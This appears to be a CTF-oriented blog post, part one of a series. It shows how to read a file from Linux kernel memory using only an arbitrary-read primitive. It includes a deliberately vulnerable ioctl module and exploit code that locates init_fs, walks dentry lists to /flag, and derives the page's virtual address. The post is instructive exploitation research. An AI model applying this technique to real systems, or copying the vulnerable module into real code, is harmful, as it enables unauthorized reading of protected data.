From AAR to /flag (Part 1)

For kernel challenges, an AAR primitive is very powerful. Sometimes it’s even enough to extract the flag without RIP control. I decided to investigate into it. In this post, I am going to extract a file with AAR only.


My very first solved kernel challenge solved is “SCTF 2021 flying_kernel”. In that challenge, there’s a format string vulnerability, where you can achieve AAR. I did not have experience with kernel exploitation, so I just brute-forced the address space with “%s” and found the flag.

Two weeks ago, there was a challenge called krce from zer0pts CTF 2022. The challenge is a simple heap buffer overflow and we achieved AAR and AAW initially. However, we are not provided with a shell, therefore modifying task struct credential is not enough to give us a shell. My initial thought is to find the memory where “busybox” resides, and write shellcode to it so that when “umount” is executed we spawn a shell. Unfortunately, the disk layout is very different each time, so we don’t have a fixed offset. We solved the challenge using another method, but I knew I can somehow find the address reliably.

Here I am.

Works have been done

So the first thing I did is to Google whether people have done this sort of thing before, and I found this writeup presented by team Eureka. I know this was a renowned team back in the days, and they became team r3kapig with team FlappyPig. Anyways, it’s a team I looked up to when I first played CTF.

I suggest you scan this writeup before continuing, as in this part we’re just repeating the exploit, but in a detailed process.

In Theory

First, init_fs is a fs_struct struct, and it is at a fixed offset to kernel base.

init_fs.root.dentry is a pointer to struct dentry.


A dentry is the glue that holds inodes and files together by relating inode numbers to file names. Dentries also play a role in directory caching which, ideally, keeps the most frequently used files on-hand for faster access. File system traversal is another aspect of the dentry as it maintains a relationship between directories and their files.

We can see that (init_fs.root.dentry)->d_iname is /, so this is the root directory.

To access its children, it has a (init_fs.root.dentry)->d_subdirs, which is a Linux linked list. We can iterate this linked list and find the dentry of /flag.

After getting the flag file’s dentry (let’s call it flag_dentry), we can access its inode flag_dentry->inode.

Then, in this inode structure, it contains the memory mapping information flag_dentry->inode->i_mapping. The structure here is called address_space, and we need to get the page info from it and find the actual page.

In Practice

However, there are a few tricky problems we need to solve: Randomized layout and different offsets. My goal is to implement a universal exploit, but in this post, I am going to write a sloppy one that works on my own kernel only.

I wrote a vulnerable kernel module as follows.

struct request{
  void* addr;
  void* buf;
  int size;

static long module_ioctl(struct file *filp, unsigned int command, long unsigned int buf) {
  struct request req;
  copy_from_user(&req, buf, sizeof(struct request));
  if(command == 0x1234){
    return copy_to_user(req.buf, req.addr, req.size);

Find init_fs

As described above, we need to locate init_fs. It is a global variable in the kernel, and it should be at a fixed offset to the kernel. However, without the symbol names, it’s still not easy to find its address.

init_fs is referenced in struct task_struct init_task, and it has the following layout.

	char				comm[TASK_COMM_LEN];  // Default 16

	struct nameidata		*nameidata;

	struct sysv_sem			sysvsem;
	struct sysv_shm			sysvshm;
	unsigned long			last_switch_count;
	unsigned long			last_switch_time;
	struct fs_struct		*fs;  // In init_task, this points to init_fs

And for init_task, the comm is always (or not, please correct me if it’s not) swapper.

So we can start to brute-force the kernel bss to find swapper string, and then find the init_fs.

unsigned long swapper_string = 0;
int i = 0;
unsigned long val;
  printf("%p\r", (void*)(kernel_bss_base + i * 8));
  val = read8((void*)(kernel_bss_base + i * 8));
  if (val == 0x2f72657070617773){  // swapper
    swapper_string = kernel_bss_base + i * 8;
    printf("[+] Found \"swapper\" string @ %p\n", swapper_string);
unsigned long init_fs = read8((void*)(swapper_string + 0x40));  // May vary due to config

Find init_fs.root.dentry

This title might be confusing: since you already have init_fs, isn’t init_fs.root.dentry just init_fs + some_offset? Well, here’s the definition of the structs.

struct fs_struct {
	int users;
	spinlock_t lock;
	seqcount_spinlock_t seq;
	int umask;
	int in_exec;
	struct path root, pwd;
} __randomize_layout;

struct path {
	struct vfsmount *mnt;
	struct dentry *dentry;
} __randomize_layout;

Notice the __randomize_layout. This is a security mitigation so that the compiler will randomize the layout of the struct.

It is not entirely safe though and we can bypass it. (It’s not a security design flaw, but the purpose of this mitigation is not to prevent actions we are doing now). But in this post, I am just going to write the easy version that works for my kernel only. I am going to improve it in the next post. Here we just assume we know all randomized offsets.

unsigned long root_dentry = read8((void*)(init_fs + 0x20));  // Notice, randomized

Iterate root_dentry’s children

Next is to find the children of this dentry. As mentioned before, the type for d_subdir is Linux’s doubly linked list, defined as follows.

struct list_head {
    struct list_head *next;
    struct list_head *prev;

You might be surprised if it’s your first time seeing this, because I was. Where is the data stored?

What I did is to find references to d_subdirs and see how the Linux kernel handles it.

// fs/coda/cache.c
list_for_each_entry(de, &parent->d_subdirs, d_child) {
  if (d_inode(de) ) 
    coda_flag_inode(d_inode(de), flag);

Dig deeper…

#define list_for_each_entry(pos, head, member)				\
	for (pos = list_first_entry(head, typeof(*pos), member);	\
	     !list_entry_is_head(pos, head, member);			\
	     pos = list_next_entry(pos, member))

#define list_first_entry(ptr, type, member) \
	list_entry((ptr)->next, type, member)

#define list_entry(ptr, type, member) \
	container_of(ptr, type, member)

And deeper…

#define container_of(ptr, type, member) ({        \
	void *__mptr = (void *)(ptr);					          \
	((type *)(__mptr - offsetof(type, member))); })

Here’s a diagram helps you understanding.

Here is the code to iterate the filenames,

unsigned long curr_filename_ptr = 0;
unsigned long curr_filename = 0;
unsigned long dummy = 0;
unsigned long curr_dentry = root_dentry;
unsigned long next = root_dentry + 0xa0;  // offset d_subdir
for(int i = 0; i < 30; i++){
  curr_filename_ptr = read8((void*)(curr_dentry + 0x28));  // d_name, points to d_iname
  curr_filename = read8((void*)(curr_filename_ptr));
  printf("[+] Current filename is :\"%s\" %p\n", &curr_filename, curr_filename);
  if(curr_filename == 0x67616c66){  // flag
  for(int j = 0; j < i + 1; j++){
    next = read8((void*)next);
  curr_dentry = next - 0xa0 + 0x10;  // 0x10 = offset d_subdir - offset d_child
  // printf("[+] Next entry is %p\n", curr_dentry);
  puts("Cannot find file");

And we can find the inode of flag.

unsigned long flag_dentry = curr_dentry;
unsigned long inode = read8((void*)(flag_dentry + 0x30));  // may vary

Find the page using inode

Now only one thing needs to be done: find the inode memory mapping. This is done via the member struct address_space *.

In the writeup, Linux still uses struct radix_tree_root to store page information. It is now replaced with a new data structure called xarray, which stands for extended array. It took me some time to figure out how to get the page from an address_space. Here’s my solution.

I found two helper functions read_mapping_page and page_address in Linux kernel source code and added another functionality in the vulnerable kernel module.

else if(command == 0x1235){
  struct page *page;
  page = read_mapping_page(((struct inode*)req.addr)->i_mapping, 0, NULL);
  // return copy_to_user(req.buf, &page, 8);
    return PTR_ERR(page);
  void* addr = page_address(page);
  return copy_to_user(req.buf, &addr, 8);

So I can pass the pointer of flag’s inode to the kernel and let it do the extraction and see how it works. And here is how it works. First, we need to get a struct page from this xarray.

struct xarray {
	spinlock_t	xa_lock;
	gfp_t		xa_flags;
	void __rcu *	xa_head;

Since this file is small, it should only have one page. The xa_head directly points to the page struct we want. It really confuses me when I did a p *(struct page*) 0xsome_addr and it looks weird that there’re negative values for counters.

By verifying using the kernel module, it is how you find the page struct.

Then is to find the actual virtual address based on that page struct. The function I used is page_address. Though it is not identified as inline, the compiler compiles it into assembly directly. Using gdb I can see it reads two values, one is page_offset_base and the other is vmemmap_base. These two are also kernel bss addresses and at fixed offsets.

call   0xffffffff81233e50 <read_cache_page>
sub    rax,QWORD PTR [rip+0xffffffffc219601b]        # 0xffffffff82198090 <vmemmap_base>
mov    rdi,QWORD PTR [rsp+0x10]
sar    rax,0x6
shl    rax,0xc
add    rax,QWORD PTR [rip+0xffffffffc219600f]        # 0xffffffff821980a0 <page_offset_base>
mov    QWORD PTR [rsp],rax

This is the last piece of the puzzle. And here is the exploit.

unsigned long inode_addr_space = read8((void*)(inode + 0x30));
printf("[+] inode->i_mapping is @%p\n", inode_addr_space);
unsigned long page_struct = read8((void*)(inode_addr_space + 0x10));
printf("[+] page_struct is at @%p\n", page_struct);

unsigned long page_offset_base = read8((void*)(kernel_text + 0x11980a0));  // page_offset_base
unsigned long vmemmap_base = read8((void*)(kernel_text + 0x1198090));  // vmemmap_base
unsigned long file_page = (((page_struct - vmemmap_base) >> 6) << 12) + page_offset_base;
printf("[+] file page is @%p\n", file_page);

What to expect for part 2

Like I said before, I am going to give a universal solution. Here we have a few problems still not solved:

  • Randomized layout
  • Only files mapped to one page are possible
  • Still some offsets (page_offset_base, vmemmap_base)

To solve these, decompilation might be needed. If you read the writeup I’ve linked, it shows how to manually find the offsets. In the next part, I will develop an exploit to find it automatically.